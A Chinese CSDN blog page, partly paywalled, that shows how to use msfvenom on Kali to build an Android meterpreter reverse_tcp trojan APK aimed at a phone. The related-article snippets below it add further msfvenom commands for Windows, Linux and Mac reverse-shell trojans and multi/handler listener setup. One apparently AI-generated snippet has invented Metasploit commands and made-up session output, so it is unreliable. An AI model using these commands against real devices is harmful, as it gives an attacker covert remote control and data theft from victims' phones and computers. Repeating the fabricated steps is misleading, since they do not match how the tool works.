msf生成木马攻击android手机

最新推荐文章于 2024-08-08 10:32:49 发布
最新推荐文章于 2024-08-08 10:32:49 发布
阅读量6.6k 收藏 13
点赞数 3
分类专栏: 网络安全&云安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41490561/article/details/105017683
版权
在kali攻击机上,通过生成反弹木马并启动msf监听,成功安装到oppor9st靶机上,尽管手机报毒,说明了攻击过程中的安全挑战与加壳技术的应用。
摘要由CSDN通过智能技术生成

  • 实验环境

攻击机:kali       IP:192.168.43.5

靶机:oppor9st

 

  • 生成木马攻击android手机

1.在kali上生成反弹木马

root@afei:~# msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.43.5 lport=6666 R > hello.apk

[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload

[-] No arch selected, selecting arch: dalvik from the payload

No encoder or badchars specified, outputting raw payload

Payload size: 10088 bytes



root@afei:~# ls

Cookies Desktop hack-tools hello.apk 抖音.exe

root@afei:~#

 

2.使用msf开启监听


                

        

        

    

  


        

            

                

                

                了解本专栏
                
                
                  
                订阅专栏 解锁全文
                 
                
                    
                    超级会员免费看
                
            

            
            
            
        

    

      

        

            

              
                
                  afei00123
                
              
            

            

                关注
              
            

        

        

          
      

      

            

                专栏目录
          

                

                        订阅专栏
                









                



	

		

			

				
					
msfvenom制作windows/linux/android/ios木马

				
			

			

				

					Cwillchris的博客
				

				

					05-04
					
					1952
					
				

			

		

		

			
				
msfvenom选项如下

-p, --payload<payload> 指定 payload(攻击荷载)。如果使用自定义payload,请使用'-'或者stdin指定。

-l, --list [module_typel列出指定模块的所有可用资源。模块类型包括:payloads, encoders, nops, all

-n, --nopsled <length>为payload预先指定一个NOP滑动长度。

-f, --format <format>指定输出格式(使

			
		

	



                

              
                



	

		

			

				
					
msf安卓手机木马实战要点整理

				
			

			

				

					Vdieoo的博客
				

				

					04-07
					
					5600
					
				

			

		

		

			
				
Msf手机木马高级选项设置说明

Androidwakelock 阻止手机休眠以便处理耗时操作

AutoUnhookProcess ?

AutoVerifySession 自动验证删除无效会话

AutoVerifySessionTimeout 超时期间等待会话验证发生在几秒钟内

EnableStageEncoding 对第二级有效载荷进行编码

Sessi...

			
		

	



                


  
              

                


	

		

			

				
					
msf使用木马控制android手机

				
			

			

				

					my_name_is_sy的博客
				

				

					05-18
					
					2440
					
				

			

		

		

			
				
使用msfvenom生成木马控制手机

			
		

	





	

		

			

				
					
熟悉msfvenom生成木马程序过程,并执行和监听控制.

				
			

			

				

					suixinxxx的博客
				

				

					11-04
					
					3369
					
				

			

		

		

			
				
一,目的:熟悉msfvenom生成木马程序过程,并执行和监听控制.

二,工具:MSF

三,原理:msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线

四,过程:

1,查看帮助

命令: root# msfvenom -h

结果:



2,生成

			
		

	



		

			
		



	

		

			

				
					
msfconsole生成安卓木马版本低

				
			

			

				

					mjy60的博客
				

				

					08-08
					
					428
					
				

			

		

		

			
				
打开AndroidManifest文件将        android:minSdkVersion="10"改为        android:minSdkVersion="16"android:targetSdkVersion="17" />改为    android:targetSdkVersion="23" />进入文件123中(我这里的名字是123)用vim打开AdnroidManifest.xml。在<application>标签上方添加标签上方添加。用apktool将文件反编译。

			
		

	





	

		

			

				
					
我的MSFAndroid木马渗透的学习笔记

				
			

			

				

					yuan_boss的博客
				

				

					06-07
					
					5120
					
				

			

		

		

			
				
使用kali制作Android木马并进行通讯录渗透的学习笔记

			
		

	





	

		

			

				
					
Kali Linux使用MSF木马入侵安卓手机

				
			

			

				

					philip_z的博客
				

				

					02-13
					
					8405
					
				

			

		

		

			
				
Kali Linux使用MSF木马入侵安卓手机

			
		

	





	

		

			

				
					
利用msf框架生成常见的木马

				
			

			

				

					weixin_42035825的博客
				

				

					03-23
					
					1837
					
				

			

		

		

			
				
常用木马
安卓app
msfvenom -p android/meterpreter/reverse_tcp LHOST=ip LPOR=8888 -o test.apk
Linux:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=ip LPOR=8888 -f elf>shell.elf
Mac:
msfvenom -p osx/x...

			
		

	





	

		

			

				
					
KALI使用MSF攻击安卓设备

				
			

			

				

					weixin_55357256的博客
				

				

					07-10
					
					2535
					
				

			

		

		

			
				
万事俱备,我们输入run来启动程序,输入完成后在手机上点击刚才我们装好的应用,注意,点开应用后不会有任何反应,但应用已经进入后台运行,不必重复打开!有很多人在这一步失败了,要么没反应,要么代码乱窜个不停,那就是网络或手机的问题。这期是kali使用MSF进行安卓渗透的保姆级别教程,话不多说,直接开始。现在准备工作做完了,我们下一步运行msfconsole。

			
		

	





	

		

			

				
					
msfvenom & msfconsole——msfvenom生成木马入侵WinServer2008及Android手机

				
			

			

				

					Ho1aAs‘s Blog
				

				

					07-29
					
					6356
					
				

			

		

		

			
				
文章目录一、使用环境二、msfvenom编写Trojan木马Ⅰ、电脑端.exe格式Ⅱ、移动端.apk格式三、msfconsole控制感染对象Ⅰ、电脑端示例:`shell`获取Windows的CMDⅡ、移动端示例:`webcam_stream`获取Android摄像头实时画面完

免责声明:本文章仅供网络安全方面学习、交流使用,任何操作与作者无关
请遵守我国法律法规

一、使用环境

VMware V15.5.0
Kali-Linux-2020.2
msfconsole
msfvenom
Windows Se

			
		

	





	

		

			

				
					
msf生成木马

				
			

			

				

					qq_44657899的博客
				

				

					04-03
					
					4219
					
				

			

		

		

			
				
Windows:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.110 LPORT=4444 -f exe -o 123.exe
msfvenom -p windows/meterpreter/bind_tcp  LPORT=<Attack Port> -f dll >/root/bind_xx.dll
msfvenom -p windows/x64/meterpreter/reverse_tcp_rc4 LHOST

			
		

	





	

		

			

				
					
使用msf工具对安卓手机进行渗透攻击———超详细

					
热门推荐

				
			

			

				

					weixin_71669458的博客
				

				

					07-28
					
					1万+
					
				

			

		

		

			
				
1.需要安装好kali的虚拟机2.在Windows电脑上需要配置Java环境变量。

			
		

	





	

		

			

				
					
使用msfvenom生成木马

				
			

			

				

					Sylon的博客
				

				

					08-27
					
					3525
					
				

			

		

		

			
				
msfvenom

Options:

-p, --payload < payload> 指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用& #039;-& #039;或者stdin指定

-l, --list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops,...

			
		

	





	

		

			

				
					
metasploit、msfvenom生成木马入侵电脑及手机

				
			

			

				

					weixin_34205076的博客
				

				

					06-11
					
					1166
					
				

			

		

		

			
				
简介
msfvenom
msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件

查看所有--payload的模块

msfvenom -l payloads


文件后缀名-f的格式

msfvenom --he...

			
		

	





	

		

			

				
					
msf生成简单木马

				
			

			

				

					qq_44881113的博客
				

				

					09-04
					
					328
					
				

			

		

		

			
				
windows 木马

msfvenom -p windows/meterpreter/reverse_http lhost=192.168.1.128 lport=6666 SessionCommunicationTimeout=0 SessionExpirationTimeout=0 -f exe>shell.exe

监听

msfconsole

use exploit/multi/handler

set payload windows/meterpreter/reverse_http

s

			
		

	





	

		

			

				
					
msf安卓远控木马版本不兼容

				
			

			

				

					L125_的博客
				

				

					01-25
					
					969
					
				

			

		

		

			
				
关于msf安卓木马的问题,求大神看看

			
		

	





	

		

			

				
					
利用MSF攻击Android

				
			

			

				

					qq_45746768的博客
				

				

					07-08
					
					3864
					
				

			

		

		

			
				
利用Metasploit攻击Android

			
		

	





	

		

			

				
					
msfvenom生成木马利用

				
			

			

				

					zzlx123的博客
				

				

					12-23
					
					2287
					
				

			

		

		

			
				
一开始想着把自己的物理主机当作靶机来执行木马,奈何发现不能从kali拖拽文件,所以先处理了下Tools的问题。
在安装Tools的时候提示CD-ROM门锁定,如果有和我一样问题的朋友可以按照我的方法来解决。
0x00 关闭kali
0x01 点击编辑此虚拟机

0x02 将此处改为使用物理驱动器

0x03 再次开启虚拟机,等开启后选择安装Tools
0x04 他会自动进行安装,进入系统后打开文件...

			
		

	





	

		

			

				
					
kail里面使用msf工具生成一个Android木马程序

					
最新发布

				
			

			

				

					09-20
				

			

		

		

			
				
Kali Linux是一个著名的开源渗透测试平台,其中包含Metasploit Framework (MSF) 这个强大的攻击工具集。如果你想在Kali里利用Metasploit生成针对Android的恶意软件(木马),你需要按照以下步骤操作:

1. **安装 Metasploit**:首先,在终端中更新系统并安装Metasploit框架:
   ```
   sudo apt-get update
   sudo apt-get install -y metasploit-framework
   ```

2. **加载 Android payload**:在Metasploit的交互模式(`meterpreter>`提示符下),输入`use exploit/multi/handler`选择通用处理器的处理程序。然后输入`set platform android`设置目标平台为Android。

3. **选择payload**:查看可用的Android payload,如 `search 'android'`。例如,如果你想要发送短信诱导用户点击,可以使用`exploit/multi/handler -p android/meterpreter/reverse_sms`。记得替换`RHOSTS`、`LPORT`等变量为你实际的目标主机和端口。

4. **配置Payload**:设置接收连接的IP地址和端口,以及必要的权限提升选项等。

5. **生成木马**:最后,运行命令`run`执行生成过程,Metasploit会生成一个Android木马文件,通常以`.apk`文件形式提供。

```plaintext
meterpreter > use exploit/multi/handler
meterpreter > set platform android
meterpreter > search 'android'
[*] Modules matching the query 'android':
[+] exploit/multi/handler - Multi-handler for exploitation payloads
[+] exploit/multi/handler/android/meterpreter/reverse_https - HTTPS reverse TCP handler for Android
[+] exploit/multi/handler/android/meterpreter/reverse_http - HTTP reverse TCP handler for Android
...
meterpreter > set payload android/meterpreter/reverse_sms
meterpreter > set lhost <your_ip_address>
meterpreter > set lport <your_port>
meterpreter > run

[*] Generating stage...
[*] Sending staging package...
[*] Meterpreter session 1 opened (<your_ip_address>:<your_port>) at <target_device>:<received_port> by 192.168.1.10 as uid 0
```

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		
评论 2

	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  





	
打赏作者

	

		

		
			
		
		

		

			
afei00123

			
您的支持是我创作最大的动力

		

	

	

			

	

	

    ¥1
    ¥2
    ¥4
    ¥6
    ¥10
    ¥20
	

	

		

			

				

					扫码支付:¥1
				

				

					

					
					获取中
					

				

				

					
					
					扫码支付
				

			

		

		

			
您的余额不足,请更换扫码支付或充值

			
打赏作者

		

	



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值